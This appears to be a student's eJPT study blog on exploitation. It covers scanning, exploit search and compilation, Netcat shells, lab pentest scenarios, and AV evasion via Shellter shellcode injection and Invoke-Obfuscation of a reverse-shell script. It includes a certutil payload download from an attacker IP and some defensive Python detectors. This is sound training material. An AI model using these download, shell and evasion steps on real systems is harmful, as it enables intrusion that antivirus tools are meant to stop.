eJPT - 3.4 Exploitation

Introduction
Exploitation consists of techniques and tools used by adversaries / penetration testers to gain an initial foothold on a target system or network. You can only exploit a target if you know what is vulnerable.
Exploitation methodology:
Identify vulnerable services
Identify and prepare exploit code
Gain access
Obtain remote access to the target system
Bypass AV detection
Pivot onto other systems
Vulnerability Scanning
Banner Grabbing
This is an information gathering technique used by penetration testers to enumerate information regarding the target operating system as well as the services that are running on its open ports. The primary objective is to identify the service running on a specific port as well as its version.
Banner grabbing can be performed through various techniques:
A service version detection scan with Nmap
Connecting to the open port with Netcat
Authenticating to the service (SSH, FTP, Telnet, etc.)
There is a very good Nmap script for banner grabbing called banner. It can sometimes be useful but is not always necessary, as most of the time the Nmap service detection scan gives you the same information.
We can use Netcat by running the following command with the target IP followed by the port that you want to check:
nc 10.10.10.10 80   # nc <target_ip> <target_port>
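As an added example (not code from the original post), the following Python script does the same thing as the Netcat and Nmap banner grabs above, but in a form you can read: it connects, waits briefly for a banner the service volunteers (SSH, FTP), falls back to an HTTP probe for services that stay silent until asked, parses the banner into a service name and version, and compares the version against a baseline so outdated services stand out in an inventory. The banners, the regex rules and the minimum-version baseline are all constructed for the demo; the script serves them from a local one-shot listener on 127.0.0.1 so it runs offline.

```python
import re
import socket
import threading
from typing import Optional, Tuple

# Constructed banners served by the local demo server below (no real hosts involved).
# The HTTP entry stays silent until it receives a request, like a real web server,
# which is why the grabber needs an active probe as well as a passive read.
SAMPLE_SERVICES = {
    "ssh":  (b"SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8\r\n", False),
    "ftp":  (b"220 (vsFTPd 2.3.4)\r\n", False),
    "http": (b"HTTP/1.0 200 OK\r\nServer: Apache/2.4.18 (Ubuntu)\r\n\r\n", True),
}

# Hypothetical, minimal banner-to-(service, version) rules; extend per engagement.
BANNER_PATTERNS = [
    ("ssh",  re.compile(r"SSH-\d\.\d-OpenSSH_([\w.]+)")),
    ("ftp",  re.compile(r"vsFTPd ([\d.]+)")),
    ("http", re.compile(r"Server: (\S+)")),
]

# Constructed baseline of the oldest acceptable version per service (an assumption,
# not vendor advice): anything below it is reported for vulnerability research.
MIN_VERSION = {"ssh": (7, 4), "ftp": (3, 0), "http": (2, 4, 25)}

HTTP_PROBE = b"HEAD / HTTP/1.0\r\n\r\n"


def grab_banner(host: str, port: int, timeout: float = 1.0) -> bytes:
    """Connect, wait briefly for a volunteered banner, otherwise send an HTTP probe."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        try:
            return sock.recv(1024)
        except socket.timeout:
            pass
        sock.sendall(HTTP_PROBE)
        try:
            return sock.recv(1024)
        except socket.timeout:
            return b""


def parse_banner(raw: bytes) -> Optional[Tuple[str, str]]:
    """Map a raw banner to (service, version) using BANNER_PATTERNS."""
    text = raw.decode("ascii", errors="replace")
    for service, pattern in BANNER_PATTERNS:
        match = pattern.search(text)
        if match:
            return service, match.group(1)
    return None


def version_tuple(version: str) -> Tuple[int, ...]:
    """'7.2p2' -> (7, 2, 2); 'Apache/2.4.18' -> (2, 4, 18)."""
    return tuple(int(n) for n in re.findall(r"\d+", version))


def is_outdated(service: str, version: str) -> bool:
    """True when the parsed version sorts below the constructed baseline."""
    return version_tuple(version) < MIN_VERSION[service]


def serve_banner_once(banner: bytes, wait_for_request: bool) -> int:
    """Start a one-shot local demo server on an ephemeral port; returns the port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def handler() -> None:
        conn, _ = srv.accept()
        with conn:
            if wait_for_request:
                conn.recv(1024)  # behave like a web server: answer only when asked
            conn.sendall(banner)
        srv.close()

    threading.Thread(target=handler, daemon=True).start()
    return port


def grab_and_check(service_key: str):
    """Grab from the local demo server; returns (service, version, outdated) or None."""
    banner, waits = SAMPLE_SERVICES[service_key]
    port = serve_banner_once(banner, waits)
    parsed = parse_banner(grab_banner("127.0.0.1", port))
    if parsed is None:
        return None
    service, version = parsed
    return service, version, is_outdated(service, version)


if __name__ == "__main__":
    for key in SAMPLE_SERVICES:
        print(key, grab_and_check(key))
```

Against a real host you would call grab_banner with the target IP and port instead of the demo server; the passive-then-probe order matters because a service that never volunteers a banner (HTTP) looks identical to a filtered port if you only listen.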
Nmap Scripts
Nmap scripts are located at /usr/share/nmap/scripts/. View some of the notes for this section here.
As an example, we can use the shellshock script in this case with the following command.
nmap -sV -p 80 --script=http-shellshock --script-args="http-shellshock.uri=/gettime.cgi" 10.10.10.10
Scanning with Metasploit
We covered Metasploit in depth (including port scanning, enumeration, exploitation and post-exploitation) in the two previous blog posts. Click here for the first and here for the second post.
Exploits
After identifying a potential vulnerability in a target or in a service running on it, the next step is to find an exploit for that vulnerability. It is important to note that downloading and running exploit code against a target can be quite dangerous. It is therefore recommended to analyse the exploit code closely to ensure that it works as intended. You can also use exploits from GitHub, as long as you are sure nothing malicious is happening in the background.
There are a handful of legitimate and vetted exploit databases such as:
Exploit Database
Rapid 7
SearchSploit
The entire Exploit Database comes pre-packaged with Kali providing you with all the exploits locally and you can search or query them with SearchSploit.
The exploits are located at /usr/share/exploitdb. It's important to note that you need to keep SearchSploit updated to have the latest exploits, which we can do with -u. We can copy (mirror) an exploit into the current directory by its exploit ID using -m. To perform a case-sensitive search, use the flag -c. You can use -e to perform an exact search.
Note - to get the links to the exploit online, use the -w option.
Fixing Exploits
Once you have downloaded an exploit, make sure to read through the code and edit the options you need to set. Follow the directions given in the exploit to ensure that it works.
Compiling Exploits
In certain cases, exploit code will be written in C/C++/C#, and therefore we will need to compile the exploit code into a portable executable (PE) or binary.
Cross-compiling is the process of compiling code for a platform other than the one performing the compilation, i.e. compiling a file for a target system (e.g. using a Kali Linux machine to compile an exploit for a Windows machine).
To compile code for a Windows machine, you will need a few tools. One of them is called Mingw-w64, which is a development environment for creating Microsoft PE applications. We can install it on Linux using the following command:
sudo apt-get install mingw-w64
In terms of compiling, you can compile a 32-bit or a 64-bit file. It is highly recommended to compile a 32-bit file, as this will run on both 32-bit and 64-bit systems. Mingw-w64 ships two compilers: x86_64-w64-mingw32-gcc for 64-bit and i686-w64-mingw32-gcc for 32-bit. Once you have downloaded the code, we can compile the exploit as a 64-bit file:
x86_64-w64-mingw32-gcc 9303.c -o exploit   # 9303.c is the downloaded exploit (exploit ID 9303)
To compile for 32-bit systems (-lws2_32 links the Winsock library, which the exploit needs if it uses sockets):
i686-w64-mingw32-gcc 9303.c -o exploit -lws2_32
For Linux, you will need the GNU compiler installed:
sudo apt-get install gcc
To compile the exploit code for Linux:
gcc -pthread 40839.c -o exploit -lcrypt
A very useful resource is the OffSec repository of pre-compiled exploit binaries (mainly Windows). You can view it on GitLab here.
Bind & Reverse Shells
Netcat Fundamentals
Netcat is a networking utility used to read and write data to network connections using TCP/UDP. You can use it for cross-platform engagements. It utilizes a client-server communication architecture with two modes:
Client mode - to connect to any TCP/UDP port as well as a Netcat listener
Server mode - to listen for connections from clients on a specific port
It can be used to perform the following functionality:
Banner grabbing
Port scanning
Transferring files
Bind or reverse shells
By default, Netcat will use TCP ports - to use UDP ports, use the -u option.
To run Netcat as a listener on a Windows system, we can transfer the Netcat executable, which can be found on our system at /usr/share/windows-binaries, in two ways. First, we need to host the file on a web server, which we have looked at previously:
python -m SimpleHTTPServer 80
python3 -m http.server 80
Then we can download it either via a web browser or via the command prompt on the target system:
certutil -urlcache -f http://10.10.10.10/nc.exe nc.exe
We can now set up a listener on our machine and use the target machine to connect to it. This is just a proof of concept to show that the Netcat listener works.
To transfer files with Netcat, you need to have a listener that will receive the file(s).
# To set up the listener (destination of the file)
nc -nlvp 1234 > test.txt
# To transfer the file (run where you are sending the file from; 10.10.10.10 is the listener's IP)
nc -nv 10.10.10.10 1234 < test.txt
Bind Shells
A bind shell is a type of remote shell where the attacker connects directly to a listener on the target system, consequently allowing execution of commands on the target. However, this is not recommended, as it requires access to the target already, and inbound traffic to the target is likely to be blocked or filtered by a firewall.
A Netcat listener can be set up to execute a specific executable when a client connects to it. The -e option is typically used to specify a shell. On Linux systems, we can execute a shell using the -c option.
Reverse Shells
Reverse shells are much better than bind shells: with a bind shell we need to set up a Netcat listener on the target system, which is not possible if we don't have access to the target. Another reason is that inbound traffic to a system is generally blocked or filtered by a firewall, which means that a bind shell will likely fail. With a reverse shell, traffic is normally not blocked as it's outbound traffic.
To obtain a reverse connection, the target system needs to connect to our listener. One of the disadvantages of a reverse shell is that the target connects to our machine, which means it connects to our IP address, and so if that connection is ever noticed, our IP address is leaked.
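The two shell types above leave opposite traces on the target, and that is how a defender tells them apart: a bind shell is a shell or Netcat process in LISTEN state, a reverse shell is a shell process holding an ESTABLISHED connection to an external address, often on an allowed port such as 443. The following Python is an added example (not from the original post) that runs that triage logic over a constructed, simplified connection table in the style of ss -tpn / netstat output; the process list, addresses and PIDs are all made up for the demo.

```python
import ipaddress
from typing import Dict, List

# Constructed connection table (simplified `ss -tpn`/netstat style), one record per line:
# proto local_addr:port remote_addr:port state pid process
SAMPLE_CONNECTIONS = """\
tcp 10.0.0.5:22     10.0.0.9:51344      ESTABLISHED 812  sshd
tcp 10.0.0.5:49822  203.0.113.7:4444    ESTABLISHED 1337 bash
tcp 0.0.0.0:1234    0.0.0.0:*           LISTEN      2001 nc
tcp 10.0.0.5:443    198.51.100.2:51000  ESTABLISHED 900  nginx
tcp 10.0.0.5:50010  203.0.113.7:443     ESTABLISHED 1400 powershell.exe
tcp 127.0.0.1:50011 127.0.0.1:8080      ESTABLISHED 1500 bash
"""

# Processes that should rarely own a network socket on a server; a socket here needs
# triage. Hypothetical list: tune it to what is normal on the host being monitored.
SHELL_LIKE = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe", "pwsh",
              "nc", "ncat", "netcat"}


def parse_table(text: str) -> List[Dict]:
    """Split each record into its fields; ports are separated from hosts on the last ':'."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        proto, local, remote, state, pid, process = line.split()
        lhost, lport = local.rsplit(":", 1)
        rhost, rport = remote.rsplit(":", 1)
        rows.append({"proto": proto, "lhost": lhost, "lport": lport,
                     "rhost": rhost, "rport": rport, "state": state,
                     "pid": int(pid), "process": process})
    return rows


def is_external(host: str) -> bool:
    """True for a routable peer; loopback and wildcard/non-address entries are ignored."""
    try:
        return not ipaddress.ip_address(host).is_loopback
    except ValueError:  # '*' or a hostname
        return False


def find_suspicious_shells(text: str) -> List[Dict]:
    """Flag shell/netcat processes that listen (bind shell) or call out (reverse shell)."""
    findings = []
    for row in parse_table(text):
        if row["process"] not in SHELL_LIKE:
            continue
        if row["state"] == "ESTABLISHED" and is_external(row["rhost"]):
            reason = "possible reverse shell: shell process with outbound connection"
        elif row["state"] == "LISTEN":
            reason = "possible bind shell: shell/netcat process listening"
        else:
            continue
        findings.append({**row, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_shells(SAMPLE_CONNECTIONS):
        print(f"pid {f['pid']:>5} {f['process']:<15} {f['lhost']}:{f['lport']} -> "
              f"{f['rhost']}:{f['rport']} {f['state']}  {f['reason']}")
```

Note that the powershell.exe record is flagged even though its remote port is 443: the decision is made on which process owns the socket, not on the port, which is exactly the gap that makes outbound reverse shells through a permissive egress firewall detectable by host telemetry.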
Cheat Sheets
There is a GitHub repository called Payloads All The Things. This is essentially a list of commands or code that can be used to connect back to our listener to get a reverse connection. You can view it on GitHub here or here.
Another useful resource is a Reverse Shell Generator, which generates commands to use as well as msfvenom commands, etc. You can view the tool here.
PowerShell Empire
This is an introduction to PowerShell Empire. It's a pure PowerShell exploitation and post-exploitation framework built on cryptographically secure communications and a flexible architecture. It implements the ability to run PowerShell agents without needing powershell.exe. It's mostly used on Windows targets.
Starkiller is a GUI front-end for PowerShell Empire. It's an Electron application written in VueJS. PowerShell Empire and Starkiller are both available as packages in the Kali Linux repositories.
To start up the PowerShell Empire back-end server and the client:
sudo powershell-empire server
sudo powershell-empire client
View the documentation here for further information. Another framework is Metasploit which we have covered in depth already.
Exploitation
Windows Black Box Penetration Test
This is a security assessment in which the penetration tester is not provided with any information regarding the target system or network (i.e. no IP ranges, system information or default credentials).
The objective of a black box penetration test is to accurately test the security of a system or network as an external unprivileged adversary.
Scenario & Scope
You have just begun your first job as a Junior Penetration Tester and have been assigned to assist in performing a penetration test on a client's network. The pentest lead has assigned you to gain access to / exploit a host running Windows Server 2008.
You are permitted to use the Metasploit Framework.
Your primary objectives are to:
Identify services running on the target
Identify vulnerabilities within the services
Exploit these vulnerabilities to obtain an initial foothold
Portscanning & Enumeration
Since the lab is in the cloud, the easiest way to find the target IP address is to check the hosts file (/etc/hosts) or to ping demo.ine.local.
Basic Nmap service version and OS detection scan to get a quick idea
Run an Nmap UDP port scan
Another Nmap scan (but more in depth and running Nmap scripts) and export it into an XML file to input into Metasploit
Perform some banner grabbing with Netcat
Microsoft IIS FTP
Often the web application's files are accessible over FTP, and FTP is used to log in to that server. The first thing to do is to check if the FTP server allows anonymous login. We can do this using the Nmap script ftp-anon, or test it manually; in this case, it's not enabled.
Next, we can perform a brute-force on the FTP server via Hydra to find some credentials. Once we are logged in, we can see that ASP files are supported. What we could do now is generate an ASP payload using msfvenom to get a reverse shell.
OpenSSH
We can perform another brute-force with Hydra using the two user accounts to find out if those credentials work. We could also use the Metasploit module ssh_login to check or perform a brute-force.
SMB
We can use Hydra to brute-force credentials to log in via SMB. We can then view shares using smbclient or smbmap. You can also use enum4linux to enumerate information, or do so via Metasploit modules. You can use PsExec to authenticate with SMB, which gives us a command prompt. We can also exploit SMB via the EternalBlue vulnerability, as the system is vulnerable.
MySQL
Again, we can perform a brute-force with Hydra or the Metasploit module (mysql_login). We can then view the information in the MySQL database server.
Linux Black Box Penetration Test
Scenario & Scope
You have just begun your first job as a Junior Penetration Tester and have been assigned to assist in performing a penetration test on a client's network. The pentest lead was pleased with your ability to gain access to the Windows Server target and has assigned you to perform a pentest on a Linux server.
You are permitted to use the Metasploit Framework.
Your primary objectives are to:
Identify services running on the target
Identify vulnerabilities within the services
Exploit these vulnerabilities to obtain an initial foothold
Vsftpd
In this case, the system is running vsftpd 2.3.4, which we know has a vulnerability. However, it has been patched by the system administrator. Instead, we can perform a brute-force attack using Hydra to get credentials. To narrow down the brute-force, let's see which user accounts exist on the system. We can find out by exploiting the SMTP service running on port 25.
There is a Metasploit module called smtp_enum which we can use to enumerate the user accounts. We can identify a user called service and then perform a brute-force against it. Now, log in to the FTP server and upload a PHP file to the WebDAV server.
PHP
One directory or file to check on an Apache server is phpinfo.php. There is a known vulnerability in the PHP version running on the target. We can edit the exploit's Python file to run a PHP command that gives us a reverse shell. Alternatively, we can use the Metasploit module.
SAMBA
Since our Nmap scan doesn't give us the exact version of Samba running, we can use the Metasploit module called smb_version. We can then run a SearchSploit query for that version, for which there is an exploit module.
AV Evasion & Obfuscation
AV Evasion with Shellter
Defence evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defence evasion include uninstalling or disabling security software, or obfuscating or encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. (Taken from MITRE.) Essentially, we're trying to change the signature of a payload that we generate using msfvenom, for example.
AV software will typically utilize signature, heuristic and behaviour based detection.
Signature-based detection: An AV signature is a unique sequence of bytes that identifies a piece of malware. As a result, you will have to ensure that your obfuscated exploit or payload doesn't match any known signature in the AV database.
Heuristic-based detection: This relies on rules or decisions to determine whether a binary is malicious. It also looks for specific patterns within the code or in the program calls made by an executable.
Behaviour-based detection: This relies on identifying malware by monitoring its behaviour, which is generally used for newer strains of malware. It checks what the program does when it runs (i.e. does it access the Windows registry, or anything else that is suspicious).
On-disk Evasion Techniques
Obfuscation - the process of concealing something important, valuable or critical. Obfuscation reorganizes the code in order to make it harder to analyse or read.
Encoding - the process involves changing data into a new format using a scheme (e.g. encoding into base 64). However, it's a reversible process and can be decoded.
Packing - involves generating an executable with a new binary structure and a smaller size, which therefore gives the payload a new signature.
Crypters - encrypts code or payloads and decrypts the encrypted code in memory. The decryption key is normally stored in a stub. This is one of the techniques that is used in new strains of ransomware.
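To make the three detection layers and the four on-disk techniques above concrete from the defender's side, here is an added Python example (not from the original post) of a toy scanner. It has a signature layer (byte-sequence matching against a constructed signature set), a decode-and-rescan heuristic that catches content hidden by a reversible encoding such as base64, and an entropy check that flags the near-random byte distribution left behind by packing or encryption. The signatures, the sample file contents and the entropy threshold are all constructed for the demo.

```python
import base64
import binascii
import hashlib
import math
from collections import Counter
from typing import Dict, List, Optional

# Constructed signatures standing in for a vendor signature database (not real ones).
SIGNATURES = {
    "constructed-sig-1": b"CONSTRUCTED_SIG_1",
    "constructed-sig-2": b"CONSTRUCTED_SIG_2",
}

# Bits per byte; packed or encrypted data approaches 8.0, plain code/text sits far lower.
HIGH_ENTROPY_THRESHOLD = 7.2


def signature_scan(data: bytes, signatures: Dict[str, bytes] = SIGNATURES) -> List[str]:
    """Signature layer: report every known byte sequence found in the data."""
    return [name for name, sig in signatures.items() if sig in data]


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of the byte distribution, in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((c / total) * math.log2(c / total) for c in Counter(data).values())


def try_base64(data: bytes) -> Optional[bytes]:
    """Strict base64 decode; None unless the whole blob is valid base64."""
    try:
        return base64.b64decode(data, validate=True)
    except (binascii.Error, ValueError):
        return None


def scan_layered(data: bytes) -> Dict:
    """Run signature, decode-and-rescan and entropy layers and give one verdict."""
    hits = signature_scan(data)
    decoded = try_base64(data.strip())
    decoded_hits = signature_scan(decoded) if decoded else []
    entropy = shannon_entropy(data)
    if hits:
        verdict = "signature"
    elif decoded_hits:
        verdict = "signature-after-decoding"
    elif entropy >= HIGH_ENTROPY_THRESHOLD:
        verdict = "suspicious-entropy"   # packed/encrypted: needs behaviour analysis
    else:
        verdict = "clean"
    return {"signature_hits": hits, "decoded_hits": decoded_hits,
            "entropy": round(entropy, 3),
            "high_entropy": entropy >= HIGH_ENTROPY_THRESHOLD, "verdict": verdict}


def pseudo_random_bytes(n: int, seed: bytes = b"constructed") -> bytes:
    """Deterministic stand-in for packed/encrypted content (SHA-256 chain)."""
    out = bytearray()
    block = seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out.extend(block)
    return bytes(out[:n])


# Constructed sample "files" for the demo.
PLAIN_SAMPLE = b"header bytes " + SIGNATURES["constructed-sig-1"] + b" trailer bytes"
ENCODED_SAMPLE = base64.b64encode(PLAIN_SAMPLE)
PACKED_SAMPLE = pseudo_random_bytes(4096)

if __name__ == "__main__":
    for label, sample in (("plain", PLAIN_SAMPLE), ("encoded", ENCODED_SAMPLE),
                          ("packed", PACKED_SAMPLE)):
        print(label, scan_layered(sample))
```

The three samples land in three different layers: the plain file trips the signature, the base64 copy only trips it after decoding, and the pseudo-random "packed" blob matches nothing and is caught by entropy alone, which is why a packed or crypted payload pushes detection towards the behaviour layer the post describes.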
In-memory Evasion Techniques
Focuses on manipulation of memory and doesn't write files to disk
Injects payloads into a process by leveraging various Windows APIs
The payload is then executed in memory in a separate thread
Notes
You can view the documentation and other information about Shellter here. To install Shellter on Linux, use the command below.
sudo apt-get install shellter -y
Note that Shellter is a Windows executable. To run a Windows executable on a Linux or Unix system (e.g. Mac) you need Wine (32-bit), which you can install using the commands below.
sudo dpkg --add-architecture i386
sudo apt-get install wine32
To now execute Shellter:
cd /usr/share/windows-resources/shellter
sudo wine shellter.exe
In this case, the executable we will be using is vncviewer, and we will inject our shellcode into it. We will first create a directory with the executable in it. Then:
# When asked to choose an operation mode:
A
# When asked to enter in the PE target:
/home/kali/Desktop/AVBypass/vncviewer.exe
# When asked to enable stealth mode (whether to retain the original functionality of the executable):
Y
# You can then select a listed or custom payload (e.g an msfvenom payload)
Obfuscation
Obfuscation refers to the process of concealing something important, valuable or critical. Obfuscation reorganizes code in order to make it harder to analyse. As a penetration tester, you will find yourself working with PowerShell code frequently. Most AV solutions will immediately flag malicious PowerShell code, and as a result, you must be able to obfuscate or encode your PowerShell code and scripts in order to avoid detection.
Invoke-Obfuscation is an open source PowerShell v2.0+ compatible PowerShell command and script obfuscator. You can view the GitHub repository here to learn more about it.
We can run PowerShell modules or code on Linux by installing PowerShell itself:
sudo apt-get install powershell -y
# To launch PowerShell
pwsh
We can now run PowerShell code on our Linux system.
### To import a module
Import-Module ./Invoke-Obfuscation.psd1
### To run it
Invoke-Obfuscation
### To load our PowerShell reverse shell code
SET SCRIPTPATH /home/kali/Desktop/shell.ps1
Once we have obfuscated our code, we can transfer it to the target system by hosting a web server to host the file. We can then download it on the target system.
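The obfuscation tricks that tools like Invoke-Obfuscation apply (string fragments joined with +, [char] casts, backticks inside tokens, -EncodedCommand) are also what a defender's script-block and command-line heuristics look for, since a script that has been rewritten to dodge a signature tends to look nothing like hand-written PowerShell. The following Python is an added example (not from the original post or the Invoke-Obfuscation project) of such a heuristic scorer, plus a helper that decodes a -EncodedCommand argument back to readable text for triage. The rules, weights and the three harmless sample scripts (Get-ChildItem and Write-Host only) are constructed for the demo.

```python
import base64
import re
from typing import List, Optional, Tuple

# Constructed PowerShell samples; all of them only list files or print text.
CLEAN_SCRIPT = "Get-ChildItem -Path C:\\Users | Where-Object { $_.Name -like 'a*' }"
FRAGMENTED_SCRIPT = ("&('I'+'nv'+'ok'+'e-Ex'+'pr'+'es'+'si'+'on') "
                     "('Wr'+'it'+'e-'+'Ho'+'st ' + [char]104 + [char]105)")
ENCODED_COMMAND = ("powershell.exe -NoP -W Hidden -EncodedCommand "
                   + base64.b64encode("Write-Host 'constructed'".encode("utf-16-le")).decode("ascii"))

# Each rule: (name, pattern, weight, minimum matches before the rule fires).
# Hypothetical rule set: weights and thresholds are illustrative, not a vendor's.
RULES = [
    ("encoded-command", re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I), 4, 1),
    ("invoke-expression", re.compile(r"\biex\b|invoke-expression", re.I), 3, 1),
    ("string-fragment-concat", re.compile(r"'[^']{1,4}'\s*\+"), 3, 3),
    ("char-casts", re.compile(r"\[char\]\s*\d+", re.I), 2, 2),
    ("backtick-in-token", re.compile(r"\w`\w"), 2, 2),
    ("hidden-window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2, 1),
    ("join-operator", re.compile(r"-join\b", re.I), 1, 1),
]

ENCODED_ARG = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})", re.I)


def score_script(script: str) -> Tuple[int, List[str]]:
    """Sum the weights of every rule whose match count reaches its threshold."""
    score = 0
    flags = []
    for name, pattern, weight, min_hits in RULES:
        if len(pattern.findall(script)) >= min_hits:
            score += weight
            flags.append(name)
    return score, flags


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the plaintext of a -EncodedCommand argument (base64 of UTF-16LE)."""
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


if __name__ == "__main__":
    for label, sample in (("clean", CLEAN_SCRIPT), ("fragmented", FRAGMENTED_SCRIPT),
                          ("encoded", ENCODED_COMMAND)):
        score, flags = score_script(sample)
        print(f"{label:<10} score={score} flags={flags}")
    print("decoded:", decode_encoded_command(ENCODED_COMMAND))
```

The fragmented sample never contains the literal string Invoke-Expression, so the invoke-expression rule misses it, but the fragment-concatenation and [char] rules still fire; that is the general lesson of the section from the other side of the table, since a heuristic scores how the script is written rather than what it says.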
That’s it for this section. Next one up is the CTF or skill check that iNE has put up.
— Hmad
Written by Hmad
I'm a cybersecurity enthusiast with a growing focus on offensive security. Currently studying for the eJPT & ICCA, building hands-on projects like Infiltr8, and sharing everything I learn through blog posts and labs.